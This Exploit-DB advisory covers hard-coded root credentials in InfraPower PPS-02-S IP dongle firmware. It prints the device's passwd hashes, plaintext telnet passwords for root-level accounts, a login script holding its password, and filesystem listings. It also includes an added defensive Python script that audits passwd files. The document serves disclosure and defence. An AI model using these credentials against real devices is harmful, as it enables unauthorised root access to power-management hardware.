InfraPower PPS-02-S Q213V1 – Hard-Coded Credentials

  • Author: LiquidWorm
    Date: 2016-10-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/40643/
  • InfraPower PPS-02-S Q213V1 Hard-coded Credentials Remote Root Access
    
    
    Vendor: Austin Hughes Electronics Ltd.
    Product web page: http://www.austin-hughes.com
    Affected version: Q213V1 (Firmware: V2395S)
    Fixed version: Q216V3 (Firmware: IPD-02-FW-v03)
    
    Summary: InfraPower Manager PPS-02-S is a FREE built-in GUI of each
    IP dongle ( IPD-02-S only ) to remotely monitor the connected PDUs.
    Patented IP Dongle provides IP remote access to the PDUs by a true
    network IP address chain. Only 1xIP dongle allows access to max. 16
    PDUs in daisy chain - which is a highly efficient client application
    for saving not only the IP remote accessories cost, but also the true
    IP addresses required on the PDU management.
    
    Desc: InfraPower suffers from a use of hard-coded credentials. The IP
    dongle firmware ships with hard-coded accounts that can be used to gain
    full system access (root) using the telnet daemon on port 23.
    
    Tested on: Linux 2.6.28 (armv5tel)
     lighttpd/1.4.30-devel-1321
     PHP/5.3.9
     SQLite/3.7.10
    
    
    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     @zeroscience
    
    
    Advisory ID: ZSL-2016-5371
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5371.php
    
    
    27.09.2016
    
    --
    
    
    # cat /etc/passwd
    
    root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
    bin:x:1:1:bin:/bin:/bin/sh
    daemon:x:2:2:daemon:/usr/sbin:/bin/sh
    adm:x:3:4:adm:/adm:/bin/sh
    lp:x:4:7:lp:/var/spool/lpd:/bin/sh
    sync:x:5:0:sync:/bin:/bin/sync
    shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
    halt:x:7:0:halt:/sbin:/sbin/halt
    uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
    operator:x:11:0:Operator:/var:/bin/sh
    nobody:x:99:99:nobody:/home:/bin/sh
    admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
    user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
    service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
    www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
    www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
    
    # showing accounts in root group:
    
    Username: root
    Password: 8475
    --
    Username: service
    Password: ipdongle
    --
    Username: www
    Password: 9311
    --
    Username: www2
    Password: 9311
    
    # showing other less-privileged accounts: 
    
    Username: user
    Password: 8475
    --
    Username: admin
    Password: 8475
    
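The /etc/passwd listing above shows the three patterns that make these credentials a hard-coded, root-equivalent risk: extra UID 0 accounts, password hashes stored unshadowed in a world-readable file, and the same hash reused across accounts (so one recovered password opens several). The following audit script is an added example, not part of the advisory or the vendor's firmware; it parses a passwd file pulled from an extracted firmware image and reports those patterns. The sample input is the advisory's own listing, embedded as a constructed string, and the 13-character DES crypt(3) check is a heuristic on hash length and alphabet.

```python
import re
from collections import defaultdict

# Constructed sample: the /etc/passwd listing quoted in the advisory above.
PASSWD_SAMPLE = """\
root:4g.6AafvEPx9M:0:0:root:/:/sbin/root_shell.sh
bin:x:1:1:bin:/bin:/bin/sh
daemon:x:2:2:daemon:/usr/sbin:/bin/sh
adm:x:3:4:adm:/adm:/bin/sh
lp:x:4:7:lp:/var/spool/lpd:/bin/sh
sync:x:5:0:sync:/bin:/bin/sync
shutdown:x:6:11:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
uucp:x:10:14:uucp:/var/spool/uucp:/bin/sh
operator:x:11:0:Operator:/var:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
admin:4g.6AafvEPx9M:1000:1000:Linux User,,,:/home:/bin/login_script
user:4g.6AafvEPx9M:1001:1001:Linux User,,,:/home:/bin/login_Script
service:AsZLenpCPzc0o:0:0:root:/www:/sbin/menu_shell.sh
www:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www:/sbin/menu_shell.sh
www2:$1$tFXqWewd$3QCtiVztmLTe63e1WM3l6.:0:0:root:/www2:/sbin/menu_shell.sh
"""
# Heuristic: classic DES crypt(3) hashes are 13 chars from [./0-9A-Za-z]
DES_CRYPT = re.compile(r"^[./0-9A-Za-z]{13}$")

def parse_passwd(text):
    # Returns (name, hash, uid, shell) per non-blank line of a passwd file
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        name, pw, uid, _gid, _gecos, _home, shell = line.split(":", 6)
        rows.append((name, pw, int(uid), shell))
    return rows

def audit_passwd(text):
    """Flag the hard-coded-credential patterns visible in the advisory's passwd."""
    rows = parse_passwd(text)
    findings = {"uid0": [], "unshadowed": [], "des_crypt": [], "shared": {}}
    by_hash = defaultdict(list)
    for name, pw, uid, _shell in rows:
        if uid == 0 and name != "root":
            findings["uid0"].append(name)          # extra root-equivalent accounts
        if pw not in ("x", "*", "!", ""):
            findings["unshadowed"].append(name)    # hash readable by any local user
            by_hash[pw].append(name)
            if DES_CRYPT.match(pw):
                findings["des_crypt"].append(name) # legacy DES: 8-char max, fast to crack
    findings["shared"] = {h: n for h, n in by_hash.items() if len(n) > 1}
    return findings
```

Run the same function over any passwd file lifted from a firmware update (for instance via a vendor-provided image) to spot the same pattern before the device reaches production; a clean image yields empty lists.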
    --------
    
    /mnt/mtd # echo $SHELL
    /sbin/root_shell.sh
    /mnt/mtd # cat /sbin/root_shell.sh 
    #!/bin/sh
    trap ""2 3 9 24
    
    # check login
    passWork=`cat /mnt/mtd/main_conf | grep RootPassEnable | cut -d " " -f 2`
    
    if [ "$passWork" = "1" ]; then
        login_file=/mnt/mtd/root_login
        now_timestamp=`date +%s`
    
        if [ -f $login_file ]; then
            line=`wc -l $login_file | cut -c 1-9`
            if [ "$line" != "0" ] && [ "$line" != "1" ] && [ "$line" != "2" ]; then
                pre_login=`tail -n 3 $login_file | cut -d " " -f 1`
                pre_result1=`echo $pre_login | cut -d " " -f 1`
                pre_result2=`echo $pre_login | cut -d " " -f 2`
                pre_result3=`echo $pre_login | cut -d " " -f 3`
                if [ "$pre_result1" = "fail" ] && [ "$pre_result2" = "fail" ] && [ "$pre_result3" = "fail" ]; then
                    pre_timestamp=`tail -n 1 $login_file | cut -d " " -f 2`
                    result=`/sbin/checkLoginTime $pre_timestamp $now_timestamp`
                    if [ "$result" != "success" ]; then
                        echo $result
                        exit 0
                    fi
                fi
            fi
        fi
    
        echo -n "password:"
        read pass
        if [ "$pass" != "999" ]; then
            echo "wrong password"
            echo fail $now_timestamp >> $login_file
            exit 0
        fi
        echo success $now_timestamp >> $login_file
    fi
    
    /bin/sh
    /mnt/mtd # 
    
    --------
    
    /mnt/mtd # ls
    IMG001.exe  boot.old.sh  load_config.log   main_conf      net_conf      passwd_conf  snmp_conf   web_conf
    PDU3_ini    box_conf     log_memCheck.txt  main_conf.bak  net_conf.old  port_conf    snmpd.conf
    PDU3_pol    info.zip     mac_addr          me_login       ntp_conf      private      start_service.log
    
    --------
    
    /mnt/mtd # df -h
    
    Filesystem       Size    Used  Available  Use%  Mounted on
    tmpfs            256.0M  4.0K  256.0M     0%    /tmp
    /dev/mtdblock1   1.4M    96.0K 1.3M       7%    /mnt/mtd
    /dev/mtdblock5   1.0M    60.0K 964.0K     6%    /mnt/mtd1
    /dev/mtdblock6   1.0M    60.0K 964.0K     6%    /mnt/mtd2
    /dev/mtdblock7   1.0M    60.0K 964.0K     6%    /mnt/mtd3
    
    --------
    
    /www # ls -al
    
    drwxr-xr-x  5 1013 1014     0 Jan 13 08:41 .
    drwxr-xr-x 16 root root     0 Nov 28 11:17 ..
    -rwxr--r--  1 1013 1014  6875 Apr 22  2014 CSSSource.php
    -rwxr--r--  1 1013 1014   291 Apr 22  2014 Config.php
    -rwxr--r--  1 1013 1014  1685 Apr 22  2014 ConnPort.php
    -rwxr--r--  1 1013 1014  5787 Apr 22  2014 FWUpgrade.php
    -rwxr--r--  1 1013 1014  7105 Apr 22  2014 Firmware.php
    -rwxr--r--  1 1013 1014 10429 Apr 22  2014 Function.php
    drwxr-xr-x  2 1013 1014     0 Apr 22  2014 General
    -rwxr--r--  1 1013 1014  1407 Apr 22  2014 Header.php
    -rwxr--r--  1 1013 1014  6775 Apr 22  2014 IPSettings.php
    drwxr-xr-x  2 1013 1014     0 Apr 22  2014 Images
    drwxr-xr-x  2 1013 1014     0 Apr 22  2014 JavaScript
    -rwxr--r--  1 1013 1014   408 Apr 22  2014 JavaSource.php
    -rwxr--r--  1 1013 1014   849 Apr 22  2014 ListFile.php
    -rwxr--r--  1 1013 1014 12900 Apr 22  2014 Login.php
    -rwxr--r--  1 1013 1014   355 Apr 22  2014 Logout.php
    -rwxr--r--  1 1013 1014   352 Apr 22  2014 Main_Config.php
    -rwxr--r--  1 1013 1014  5419 Apr 22  2014 Menu.php
    -rwxr--r--  1 1013 1014   942 Apr 22  2014 Menu_3.php
    -rwxr--r--  1 1013 1014  4491 Apr 22  2014 Ntp.php
    -rwxr--r--  1 1013 1014 23853 Apr 22  2014 OutletDetails.php
    -rwxr--r--  1 1013 1014  1905 Apr 22  2014 OutletDetails_Ajax.php
    -rwxr--r--  1 1013 1014 48411 Apr 22  2014 PDUDetails.php
    -rwxr--r--  1 1013 1014  4081 Apr 22  2014 PDUDetails_Ajax_Details.php
    -rwxr--r--  1 1013 1014  1397 Apr 22  2014 PDUDetails_Ajax_Outlet.php
    -rwxr--r--  1 1013 1014 19165 Apr 22  2014 PDULog.php
    -rwxr--r--  1 1013 1014 29883 Apr 22  2014 PDUStatus.php
    -rwxr--r--  1 1013 1014  4418 Apr 22  2014 PDUStatus_Ajax.php
    -rwxr--r--  1 1013 1014  7791 Apr 22  2014 PortSettings.php
    -rwxr--r--  1 1013 1014 24696 Apr 22  2014 SNMP.php
    -rwxr--r--  1 1013 1014 38253 Apr 22  2014 SensorDetails.php
    -rwxr--r--  1 1013 1014 27210 Apr 22  2014 SensorStatus.php
    -rwxr--r--  1 1013 1014  5984 Apr 22  2014 SensorStatus_Ajax.php
    -rwxr--r--  1 1013 1014 40944 Apr 22  2014 System.php
    -rwxr--r--  1 1013 1014  4373 Apr 22  2014 UploadEXE.php
    -rwxr--r--  1 1013 1014  9460 Apr 22  2014 User.php
    -rwxr--r--  1 1013 1014 23170 Apr 22  2014 WriteRequest.php
    -rwxr--r--  1 1013 1014  8850 Apr 22  2014 WriteRequest_Ajax.php
    -rwxr--r--  1 1013 1014 10811 Apr 22  2014 dball.php
    -rwxr--r--  1 1013 1014   771 Apr 22  2014 doupgrate.php
    -rwxr--r--  1 1013 1014    76 Apr 22  2014 index.php
    -rwxr--r--  1 1013 1014    49 Apr 22  2014 nfs.sh
    -rwxr--r--  1 1013 1014  5410 Apr 22  2014 production_test1.php
    -rwxr--r--  1 1013 1014   723 Apr 22  2014 vaildate.php
    -rwxr--r--  1 1013 1014   611 Apr 22  2014 wiseup.php